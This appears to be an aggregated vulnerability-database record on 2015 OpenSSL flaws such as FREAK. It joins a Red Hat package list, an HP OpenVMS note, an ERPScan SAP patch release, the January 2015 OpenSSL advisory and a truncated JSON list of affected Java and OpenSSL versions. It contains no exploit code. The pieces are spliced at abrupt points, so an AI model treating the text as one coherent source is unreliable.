    x86_64: openssl-0.9.8e-33.el5_11.i686.rpm openssl-0.9.8e-33.el5_11.x86_64.rpm openssl-debuginfo-0.9.8e-33.el5_11.i686.rpm openssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm openssl-perl-0.9.8e-33.el5_11.x86_64.rpm

    RHEL Desktop Workstation (v. 5 client):

    Source: openssl-0.9.8e-33.el5_11.src.rpm

    i386: openssl-debuginfo-0.9.8e-33.el5_11.i386.rpm openssl-devel-0.9.8e-33.el5_11.i386.rpm

    x86_64: openssl-debuginfo-0.9.8e-33.el5_11.i386.rpm openssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm openssl-devel-0.9.8e-33.el5_11.i386.rpm openssl-devel-0.9.8e-33.el5_11.x86_64.rpm

    Red Hat Enterprise Linux (v. 5 server):

    Source: openssl-0.9.8e-33.el5_11.src.rpm

    i386: openssl-0.9.8e-33.el5_11.i386.rpm openssl-0.9.8e-33.el5_11.i686.rpm openssl-debuginfo-0.9.8e-33.el5_11.i386.rpm openssl-debuginfo-0.9.8e-33.el5_11.i686.rpm openssl-devel-0.9.8e-33.el5_11.i386.rpm openssl-perl-0.9.8e-33.el5_11.i386.rpm

    ia64: openssl-0.9.8e-33.el5_11.i686.rpm openssl-0.9.8e-33.el5_11.ia64.rpm openssl-debuginfo-0.9.8e-33.el5_11.i686.rpm openssl-debuginfo-0.9.8e-33.el5_11.ia64.rpm openssl-devel-0.9.8e-33.el5_11.ia64.rpm openssl-perl-0.9.8e-33.el5_11.ia64.rpm

    ppc: openssl-0.9.8e-33.el5_11.ppc.rpm openssl-0.9.8e-33.el5_11.ppc64.rpm openssl-debuginfo-0.9.8e-33.el5_11.ppc.rpm openssl-debuginfo-0.9.8e-33.el5_11.ppc64.rpm openssl-devel-0.9.8e-33.el5_11.ppc.rpm openssl-devel-0.9.8e-33.el5_11.ppc64.rpm openssl-perl-0.9.8e-33.el5_11.ppc.rpm

    s390x: openssl-0.9.8e-33.el5_11.s390.rpm openssl-0.9.8e-33.el5_11.s390x.rpm openssl-debuginfo-0.9.8e-33.el5_11.s390.rpm openssl-debuginfo-0.9.8e-33.el5_11.s390x.rpm openssl-devel-0.9.8e-33.el5_11.s390.rpm openssl-devel-0.9.8e-33.el5_11.s390x.rpm openssl-perl-0.9.8e-33.el5_11.s390x.rpm

    x86_64: openssl-0.9.8e-33.el5_11.i686.rpm openssl-0.9.8e-33.el5_11.x86_64.rpm openssl-debuginfo-0.9.8e-33.el5_11.i386.rpm openssl-debuginfo-0.9.8e-33.el5_11.i686.rpm openssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm openssl-devel-0.9.8e-33.el5_11.i386.rpm openssl-devel-0.9.8e-33.el5_11.x86_64.rpm openssl-perl-0.9.8e-33.el5_11.x86_64.rpm

    These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

    1. References:

    https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0287 https://access.redhat.com/security/cve/CVE-2015-0288 https://access.redhat.com/security/cve/CVE-2015-0289 https://access.redhat.com/security/cve/CVE-2015-0292 https://access.redhat.com/security/cve/CVE-2015-0293 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt https://www.openssl.org/news/secadv_20150319.txt https://access.redhat.com/articles/1384453

    1. Contact:

    The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

    Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

    iD8DBQFVK6+gXlSAg2UNWIIRAoSlAJ0UGwyEUVUDOKBoGDKJRsDtDdmxSwCgvH9a M4Bxjq//ZXaJCcyFFc1l5A4= =rctB -----END PGP SIGNATURE-----

    -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. HP SSL for OpenVMS: All versions prior to 1.4-502.

    HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the following locations:

    - HP SSL for OpenVMS website:
    
      http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
    
    - HP Support Center website:
    
      https://h20566.www2.hp.com/portal/site/hpsc/patch/home
    
      Note: Login using your HP Passport account. SAP <http://www.sap.com/>has released the monthly critical patch update
    

    for June 2015. This patch update closes a lot of vulnerabilities in SAP products. The most popular vulnerability is Missing Authorization Check. This month, three critical vulnerabilities found by ERPScan researchers Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.

    Issues that were patched with the help of ERPScan

    Below are the details of SAP vulnerabilities that were found byERPScan http://www.erpscan.com/researchers.

    • An XML eXternal Entity vulnerability in SAP Mobile Platform on-premise (CVSS Base Score:5.5).Updateis available in SAP Security Note2159601 https://service.sap.com/sap/support/notes/2159601. An attacker can use XML eXternal Entities to send specially crafted unauthorized XML requests, which will be processed by the XML parser. The attacker will get unauthorized access to the OS file system.
    • A Hardcoded Credentials vulnerability in SAP Cross-System Tools (CVSS Base Score:3.6).Updateis available in SAP Security Note2059659 https://service.sap.com/sap/support/notes/2059659. In addition, it is likely that the code will be implemented as a backdoor into the system.
    • A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench (CVSS Base Score:2.1).Updateis available in SAP Security Note2057982 https://service.sap.com/sap/support/notes/2057982. In addition, it is likely that the code will be implemented as a backdoor into the system.

    The most critical issues found by other researchers

    Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Security Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:

    • 2151237 https://service.sap.com/sap/support/notes/2151237: SAP GUI for Windows has a Buffer Overflow vulnerability (CVSS Base Score:9.3). An attacker can use Buffer Overflow for injecting specially crafted code into working memory, which will be executed by the vulnerable application under the privileges of that application. In case of command execution,attackercan obtain critical technical and business-related information stored in the vulnerable SAP-system or escalate their own privileges. For this time, nobody will be able to use this service, which negatively influences business processes, system downtime, and, consequently, business reputation. It is recommended to install this SAP Security Note to prevent risks.
    • 2129609 https://service.sap.com/sap/support/notes/2129609: SAP EP JDBC Connector has an SQL Injection vulnerability (CVSS Base Score:6.5). An attacker can use SQL Injections with the help of specially crafted SQL queries. They can read and modify sensitive information from a database, execute administrative operations in a database, destroy data or make it unavailable. In some cases, an attacker can access system data or execute OS commands. It is recommended to install this SAP Security Note to prevent risks.
    • 1997734 https://service.sap.com/sap/support/notes/1997734: SAP RFC runtime has a Missing AuthorizationXheckvulnerability (CVSS Base Score:6.0). An attacker can use Missing Authorization Checks to access a service without any authorization procedures and use service functionality that has restricted access. It is recommended to install this SAP Security Note to prevent risks.
    • 2163306 https://service.sap.com/sap/support/notes/2163306: SAP CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK (CVE-2015-0204, CVSS Base Score:5.0). It allows an attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened encryption, which the attacker can break to steal or manipulate sensitive data. All the attacks on this page assume a network adversary (i.e. a man-in-the-middle) to tamper with TLS handshake messages. The typical scenario to mount such attacks is by tampering with the Domain Name System (DNS), for example via DNS rebinding or domain name seizure. This attack targets a class of deliberately weak export cipher suites. It is recommended to install this SAP Security Note to prevent risks.

    References about the FREAK vulnerability:

    It is highly recommended to patch all those SAP vulnerabilities to prevent business risks affecting your SAP systems.

    SAP has traditionally thanked the security researchers from ERPScan for found vulnerabilities on theiracknowledgment page http://scn.sap.com/docs/DOC-8218.

    Advisories for those SAP vulnerabilities with technical details will be available in 3 months onerpscan.com http://www.erpscan.com/.

    --

    Darya Maenkova

    PR manager

    https://www.linkedin.com/company/2217474?trk=ppro_cprof https://twitter.com/erpscan

    http://erpscan.com/


    e-mail: d.maenkova@erpscan.com d.maenkova@erpscan.com

    address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

    phone: 650.798.5255

    erpscan.com http://erpscan.com

    . OpenSSL Security Advisory [08 Jan 2015]

    DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)

    Severity: Moderate

    A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due to a NULL pointer dereference.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.

    This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL core team.

    DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)

    Severity: Moderate

    A memory leak can occur in the dtls1_buffer_record function under certain conditions. In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion.

    This issue affects OpenSSL versions: 1.0.1 and 1.0.0.

    OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.

    This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also provided an initial patch. Further analysis was performed by Matt Caswell of the OpenSSL development team, who also developed the final patch.

    no-ssl3 configuration sets method to NULL (CVE-2014-3569)

    Severity: Low

    When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

    This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The fix was developed by Kurt Roeckx.

    ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)

    Severity: Low

    An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite using an ECDSA certificate if the server key exchange message is omitted. This effectively removes forward secrecy from the ciphersuite.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

    This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.

    RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)

    Severity: Low

    An OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. A server could present a weak temporary key and downgrade the security of the session.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

    This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.

    DH client certificates accepted without verification [Server] (CVE-2015-0205)

    Severity: Low

    An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. This effectively allows a client to authenticate without the use of a private key. This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered.

    This issue affects OpenSSL versions: 1.0.1 and 1.0.0.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p.

    This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team.

    Certificate fingerprints can be modified (CVE-2014-8275)

    Severity: Low

    OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint.

    This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

    One variant of this issue was discovered by Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS program and reported to OpenSSL on 1st December 2014 by NCSC-FI Vulnerability Co-ordination. Another variant was independently reported to OpenSSL on 12th December 2014 by Konrad Kraszewski from Google. Further analysis was conducted and fixes were developed by Stephen Henson of the OpenSSL core team.

    Bignum squaring may produce incorrect results (CVE-2014-3570)

    Severity: Low

    Bignum squaring (BN_sqr) may produce incorrect results on some platforms, including x86_64. This bug occurs at random with a very low probability, and is not known to be exploitable in any way, though its exact impact is difficult to determine. The following has been determined:

    ) The probability of BN_sqr producing an incorrect result at random is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and 1/2^128 on affected 64-bit platforms. ) On most platforms, RSA follows a different code path and RSA operations are not affected at all. For the remaining platforms (e.g. OpenSSL built without assembly support), pre-existing countermeasures thwart bug attacks [1]. ) Static ECDH is theoretically affected: it is possible to construct elliptic curve points that would falsely appear to be on the given curve. However, there is no known computationally feasible way to construct such points with low order, and so the security of static ECDH private keys is believed to be unaffected. ) Other routines known to be theoretically affected are modular exponentiation, primality testing, DSA, RSA blinding, JPAKE and SRP. No exploits are known and straightforward bug attacks fail - either the attacker cannot control when the bug triggers, or no private key material is involved.

    This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

    OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

    This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille (Blockstream) who also suggested an initial fix. Further analysis was conducted by the OpenSSL development team and Adam Langley of Google. The final fix was developed by Andy Polyakov of the OpenSSL core team.

    [1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf

    Note

    As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade.

    References

    URL for this Security Advisory: https://www.openssl.org/news/secadv_20150108.txt

    Note: the online version of the advisory may be updated with additional details over time.

    For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "jre 1.7.0 17",
            "scope": null,
            "trust": 1.8,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 17",
            "scope": null,
            "trust": 1.5,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 13",
            "scope": null,
            "trust": 1.5,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 43",
            "scope": null,
            "trust": 1.5,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 39",
            "scope": null,
            "trust": 1.5,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0:update 65",
            "scope": null,
            "trust": 1.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "oracle",
            "version": "1.7.072"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "oracle",
            "version": "1.8.025"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "oracle",
            "version": "1.6.085"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 43",
            "scope": null,
            "trust": 1.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 45",
            "scope": null,
            "trust": 1.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 38",
            "scope": null,
            "trust": 1.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "oracle",
            "version": "1.6.085"
          },
          {
            "_id": null,
            "model": "jre 1.7.0 13",
            "scope": null,
            "trust": 1.2,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "oracle",
            "version": "1.8.025"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0d"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1d"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0j"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1j"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0l"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0m"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0o"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0n"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.0h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "1.0.1b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8zc"
          },
          {
            "_id": null,
            "model": "jre 17",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 31",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 8",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 21",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 32",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.6.081"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 39",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 16",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 05",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 65",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 14",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 55",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 06",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 41",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0:update 75",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0:update 60",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 61",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 05",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 03",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 2",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 10",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0:update 65",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 45",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 01",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 41",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.6.081"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 11",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0:update 75",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.840"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 39",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 40",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 23",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 60",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 51",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 35",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 25",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 32",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.7.072"
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 45",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.691"
          },
          {
            "_id": null,
            "model": "jre 07",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 55",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.8.0:update 5",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 29",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 28",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 11",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 17",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.8.0:update 5",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.5.0 27",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 60",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 03",
            "scope": null,
            "trust": 0.9,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 4",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "oracle",
            "version": "1.776"
          },
          {
            "_id": null,
            "model": "jdk 01",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 28",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 26",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 10",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.7.0 14",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 10",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 45",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.7.0 15",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 10",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "jre 1.7.0 21",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jre 1.6.0 71",
            "scope": null,
            "trust": 0.9,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk 02",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
